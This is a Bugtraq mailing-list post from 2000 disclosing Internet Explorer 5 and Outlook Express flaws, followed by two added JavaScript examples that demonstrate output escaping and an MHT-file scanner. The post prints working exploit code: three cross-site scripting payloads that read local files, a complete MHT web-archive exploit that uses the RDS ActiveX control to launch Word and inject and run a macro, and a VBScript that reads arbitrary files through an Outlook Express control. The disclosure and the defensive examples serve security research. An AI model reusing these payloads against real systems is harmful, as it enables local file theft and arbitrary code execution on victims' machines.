Bugtraq mailing list archives
CSS Exploits + RDS (IE5)
From: s.hird () STUDENT QUT EDU AU (Shane Hird)
Date: Sun, 12 Mar 2000 21:25:15 +1000
Disclaimer: All these issues have been disclosed to MS; however, no action has been taken, so I assume they have decided not to patch the following problems.

Small CSS Overview:

Cross site scripting issues have been known for quite a while now, in fact a long time before the recent CERT advisory about the matter. MS have had security measures in place for this ever since they started displaying custom local 404 error messages and others. Taken directly from res://C:\WINDOWS\SYSTEM32\SHDOCLC.DLL/HTTP_404.HTM:

    // Security precaution: must filter out "urlResult" and "displayresult"
    forbiddenChars = new RegExp("[<>\'\"]", "g"); // Global search/replace
    urlresult = urlresult.replace(forbiddenChars, "");
    displayresult = displayresult.replace(forbiddenChars, "");

Obviously, because the page will be displaying remotely defined strings in the local zone, MS have filtered out 'dangerous' characters, which is fair enough. Without this security precaution, this page and others could easily be exploited. In fact, there are certain ones which are, which will be shown later, although they are a minor problem.

MK/RES LFN CSS Bug:

There are a few problems with the RES and MK and probably other protocols in that they don't recognise the Temporary Internet Files directory as the Internet zone when it is specified in short 8-character format, i.e. the following will be opened in the 'local' zone, whereas they would normally be opened in the 'Internet' zone if specified using the LFN:

    res://C:\Windows\Tempor~1\Content.IE5\XXXXXXX\dllfile.mid/htmlfile.htm
    mk:@MSITStore:C:\Windows\Tempor~1\Content.IE5\XXXXXXX\chmfile.chm::/htmfile.htm

This may not be much of an issue due to the fact that 'XXXXXXXX' is a random string and pretty much impossible to guess. However, Outlook places TEMP files in the TEMP directory (not the Temporary Internet Files directory) and places temp HTM files in the root of the Temporary Internet Files directory, so it is easy to guess the location.
And HTM files can be extracted and opened (in the 'local' zone) from the likes of MID files, so this can be exploited in a similar fashion to the Active Setup problem, although it would simply be a CSS exploit (which can be potentially serious, see later). There are various ways of exploiting this through Outlook using various protocols and file formats etc. I won't list them here, but basically, by not using a local temp directory and instead a random temp internet files directory, it would solve most of the problems.

Web Accessories CSS Bug:

MS have released extensions to IE that allow viewing an image list, URL list and document tree, among other things. These extensions are essentially just HTM files which parse the current HTM file and display results using script, which is shown in the local zone. Immediately one realises that this can be exploited if we can define the strings which are displayed, which we can. Each of the below lines will display a text file when one of the extensions is used on the current HTM file. This is a typical CSS bug, which can be exploited further with the use of RDS, see later.

Document Tree Exploit:

    <OBJECT ID="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.document.body.innerText);</SCRIPT>" CLASSID="CLSID:0"></OBJECT>

URL List Exploit:

    <a href="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.document.body.innerText);</SCRIPT>"></a>

Image List Exploit:

    <IMG src="<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');alert(a.document.body.innerText);</SCRIPT>">

MHT Temp File CSS Bug:

A typical temp file vulnerability. IE5 (or one of them) introduced the new 'Web Archive' format for storing web pages, which have the extension MHT. IE5 essentially takes each file which is needed for display of the page and encodes them sequentially into a single MHT file in the format of a MIME message, 7bit and Base64 encoding and all; it even has a 'From:' field.
(This, by the way, makes it difficult to send and receive MHT attachments because Outlook, or perhaps the mail server, converts it into MSG format, completely destroying the original file.) When parsing the MHT file, IE extracts each file and places it into a single locked TMP file; however, if the file referenced is in a FRAME or an IFRAME, the file is extracted and placed into its own unlocked file in the local temp directory, with guessable names, in fact even definable names. An example exploit is included with the note about RDS.

RDS ActiveX Control Bug:

A new ActiveX control, I think included with Visual Studio and probably IIS and other databasey type applications :). Anyway, when invoked in the local zone one can avoid the 'ActiveX' warning by creating business objects via DCOM using IP 127.0.0.1 instead of 'in-process', and from there take practically any action, with permissions dependent on the current DCOM settings and current user. I believe this works on default configurations of any Win machine with RDS installed. This example fires up MS Word and runs a custom macro, from which you can take any action at all. The example is included as part of the MHT exploit, which will extract a file to the temp directory and open it. Hopefully this won't get stuffed up by any 'smart' mail server.

<------------------------ snip MHTExp.MHT --------------------->
From: <Saved by Microsoft Internet Explorer 5>
Subject: MHT Exploit
Date: Thu, 17 Feb 2000 19:31:45 +1000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="----=_NextPart_000_0000_01BF797D.A014BDD0"
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600

This is a multi-part message in MIME format.

------=_NextPart_000_0000_01BF797D.A014BDD0
Content-Type: text/html; charset="Windows-1252"
Content-Transfer-Encoding: 7bit
Content-Location: MHTEXploit

<html>
<head>
<title>MHT Exploit</title>
</head>
<frameset cols="*">
<frame name="local" src="file:Exploit.htm">
</frameset>
</html>

------=_NextPart_000_0000_01BF797D.A014BDD0
Content-Type: text/html; charset="Windows-1252"
Content-Transfer-Encoding: 7bit
Content-Location: file:Exploit.htm

<HTML>
<script language="VBScript"><!--
if location.protocol <> "file:" then
    document.writeln("Exploiting MHT temp file vuln - Shane Hird")
    'Note - Replace with required temp directory.
    window.open("file://C:\Documents and Settings\Shane\Local Settings\Temp\Exploit.htm")
else
    msgbox("Running in local context")
    set rds = CreateObject("RDS.DataSpace")
    set busobj = rds.CreateObject("Word.Application", "127.0.0.1")
    busobj.visible = TRUE
    Set NT = busobj.Templates(1).VBProject.VBComponents(1).CodeModule
    NT.DeleteLines 1, NT.CountOfLines
    NT.InsertLines 1, "Public Sub Example()"
    NT.InsertLines 2, " MsgBox (" + Chr(34) + "Example Code..." + Chr(34) + ")"
    NT.InsertLines 3, "End Sub"
    busobj.run "Normal.ThisDocument.Example"
    NT.DeleteLines 1, NT.CountOfLines
    set NT = Nothing
    busobj.quit
    window.close
end if
--></script>
</HTML>

------=_NextPart_000_0000_01BF797D.A014BDD0--
<---------------- snip MHTExp.mht ------------------->

Outlook Express ActiveX Exploit:

There is also this old exploit which apparently got fixed in IE5, but was never announced. It will allow reading of any file on the user's machine, after the first newline of the file, using an ActiveX control provided by Outlook Express.

    <object id="MIME" classid="clsid:1C82EAD9-508E-11D1-8DCF-00C04FB951F9" width="500" height="150"></object>
    <script language="Vbscript"><!--
    msgbox("Please wait while control is loaded..." + Chr(10) + "Outlook Express MIME Editor Exploit" + Chr(10) + "Written by: Shane Hird")
    MIME.src="C:\test.txt"
    msgbox("File Loaded")
    document.write("<P>File is displayed below</P><HR><PRE>")
    document.write(MIME.messagesource)
    --></script>

End:

I think that's all of them. Excuse the mess, and the fact that they're all compiled into one message, but they're all kind of related and I didn't think they deserved their own individual post.

-Shane Hird
s.hird () student qut edu au
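An added example (editor's code, not part of Shane's post) for the "Small CSS Overview" and "Web Accessories CSS Bug" sections: it reproduces the SHDOCLC.DLL strip-the-characters precaution, sets an entity-encoding alternative beside it, and runs the three Web Accessories payloads from the post through a constructed stand-in for an accessory that reflects harvested attribute values into local-zone HTML. The `renderAccessoryList` template and the `attributeValue` helper are assumptions standing in for the real accessories' markup and parsing, which the post does not show.

```javascript
// Added example for the "Small CSS Overview" and "Web Accessories CSS Bug"
// sections; this is not code from the original post. filterForbiddenChars()
// mirrors the regexp quoted from SHDOCLC.DLL/HTTP_404.HTM, escapeHtml() is
// the encode-instead-of-strip alternative, and renderAccessoryList() is a
// constructed stand-in for a Web Accessory that echoes attribute values from
// the current document into local-zone HTML (the real accessories' markup is
// not shown on the page).

// SHDOCLC's precaution: strip <, >, ' and " globally before reflecting.
function filterForbiddenChars(s) {
  const forbiddenChars = new RegExp("[<>'\"]", "g");
  return s.replace(forbiddenChars, "");
}

// Alternative: keep the characters but make them inert as HTML text.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed stand-in for an accessory: reflect each harvested value into a
// table row after passing it through `filter`.
function renderAccessoryList(values, filter) {
  return "<table>" +
    values.map((v) => "<tr><td>" + filter(v) + "</td></tr>").join("") +
    "</table>";
}

// Would the reflected markup contain a live <script> element?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// The payload used by all three snippets in the post.
const PAYLOAD =
  "<SCRIPT>a=window.open('file://c:/test.txt');alert('wait');" +
  "alert(a.document.body.innerText);</SCRIPT>";

// Copies of the three markup snippets from the post.
const SNIPPETS = {
  documentTree: '<OBJECT ID="' + PAYLOAD + '" CLASSID="CLSID:0"></OBJECT>',
  urlList: '<a href="' + PAYLOAD + '"></a>',
  imageList: '<IMG src="' + PAYLOAD + '">',
};

// Pull a double-quoted attribute value out of a tag, roughly as the
// accessories do when they walk the document (assumed helper).
function attributeValue(tag, attr) {
  const m = new RegExp("\\s" + attr + '="([^"]*)"', "i").exec(tag);
  return m ? m[1] : null;
}

// Harvest the three values and report whether reflecting them through
// `filter` leaves a script tag in the local-zone page.
function reflectsScript(filter) {
  const values = [
    attributeValue(SNIPPETS.documentTree, "ID"),
    attributeValue(SNIPPETS.urlList, "href"),
    attributeValue(SNIPPETS.imageList, "src"),
  ];
  return containsScriptTag(renderAccessoryList(values, filter));
}

console.log("unfiltered:", reflectsScript((s) => s));             // true
console.log("stripped:  ", reflectsScript(filterForbiddenChars)); // false
console.log("escaped:   ", reflectsScript(escapeHtml));           // false
```

Stripping, as SHDOCLC does, neutralises the payload but silently changes the displayed value; entity encoding keeps the value readable in the listing while still preventing the markup from being parsed as a tag, which is why a reflecting page in the local zone should prefer encoding over deletion.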
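A second added example (editor's code, not part of Shane's post) for the "MHT Temp File CSS Bug" and "RDS ActiveX Control Bug" sections: a small parser for the MIME-style web archive container the post describes, followed by a scan for the three things MHTExp.MHT relies on, namely a FRAME or IFRAME whose src is a `file:` URL (the part IE is described as extracting into its own unlocked temp file), a `window.open` of a `file:` URL, and creation of `RDS.DataSpace`. `SAMPLE_MHT` is a constructed, trimmed copy of the post's MHTExp.MHT; the risk names and the header-folding-free parser are assumptions of this example.

```javascript
// Added example for the "MHT Temp File CSS Bug" and "RDS ActiveX Control
// Bug" sections; not code from the original post. parseMht() splits a web
// archive into its MIME parts and findRisks() flags what MHTExp.MHT relies
// on. SAMPLE_MHT is a constructed, trimmed copy of the post's MHTExp.MHT.

const SAMPLE_MHT = [
  "From: <Saved by Microsoft Internet Explorer 5>",
  "Subject: MHT Exploit",
  "MIME-Version: 1.0",
  'Content-Type: multipart/alternative; boundary="----=_NextPart_000_0000_01BF797D.A014BDD0"',
  "",
  "This is a multi-part message in MIME format.",
  "",
  "------=_NextPart_000_0000_01BF797D.A014BDD0",
  'Content-Type: text/html; charset="Windows-1252"',
  "Content-Transfer-Encoding: 7bit",
  "Content-Location: MHTEXploit",
  "",
  '<html><frameset cols="*"><frame name="local" src="file:Exploit.htm"></frameset></html>',
  "",
  "------=_NextPart_000_0000_01BF797D.A014BDD0",
  'Content-Type: text/html; charset="Windows-1252"',
  "Content-Transfer-Encoding: 7bit",
  "Content-Location: file:Exploit.htm",
  "",
  '<HTML><script language="VBScript"><!--',
  'if location.protocol <> "file:" then',
  '  window.open("file://C:\\Documents and Settings\\Shane\\Local Settings\\Temp\\Exploit.htm")',
  "else",
  '  set rds = CreateObject("RDS.DataSpace")',
  '  set busobj = rds.CreateObject("Word.Application", "127.0.0.1")',
  "end if",
  "--></script></HTML>",
  "",
  "------=_NextPart_000_0000_01BF797D.A014BDD0--",
].join("\r\n");

// Split a header block from its body at the first blank line; header names
// are lower-cased. Folded (continued) headers are not handled.
function parseHeaders(block) {
  const m = /\r?\n\r?\n/.exec(block);
  const head = m ? block.slice(0, m.index) : block;
  const body = m ? block.slice(m.index + m[0].length) : "";
  const headers = {};
  for (const line of head.split(/\r?\n/)) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { headers, body };
}

// Return the parts of an MHT file as {headers, body} objects. A file without
// a multipart boundary is treated as a single part.
function parseMht(text) {
  const top = parseHeaders(text);
  const bm = /boundary="?([^";]+)"?/i.exec(top.headers["content-type"] || "");
  if (!bm) return [top];
  const delimiter = "--" + bm[1];
  const parts = [];
  const chunks = top.body.split(delimiter); // chunks[0] is the preamble
  for (let i = 1; i < chunks.length; i++) {
    if (chunks[i].startsWith("--")) break; // closing delimiter reached
    // The CRLF after the delimiter and the one before the next belong to
    // the delimiter, not to the part.
    const chunk = chunks[i].replace(/^\r?\n/, "").replace(/\r?\n$/, "");
    parts.push(parseHeaders(chunk));
  }
  return parts;
}

// Patterns taken from what MHTExp.MHT does; names are this example's own.
const RISK_CHECKS = [
  ["frame-file-src", /<i?frame\b[^>]*\bsrc\s*=\s*["']?\s*file:/i],
  ["window-open-file", /window\.open\s*\(\s*["']file:\/\//i],
  ["rds-dataspace", /CreateObject\s*\(\s*["']RDS\.DataSpace["']\s*\)/i],
];

// Report which part (by Content-Location) triggers which check.
function findRisks(parts) {
  const risks = [];
  for (const p of parts) {
    const loc = p.headers["content-location"] || "(no Content-Location)";
    for (const [name, re] of RISK_CHECKS) {
      if (re.test(p.body)) risks.push({ part: loc, risk: name });
    }
  }
  return risks;
}

function scanMht(text) {
  return findRisks(parseMht(text));
}

console.log(scanMht(SAMPLE_MHT));
```

Run against the sample, the scan attributes the `file:` frame to the outer part (Content-Location MHTEXploit) and both the `window.open` of a temp-directory path and the `RDS.DataSpace` creation to the `file:Exploit.htm` part, which is the part the post says IE writes to its own unlocked temp file. A mail gateway that cannot rewrite MHT attachments can at least refuse ones that trip the first check.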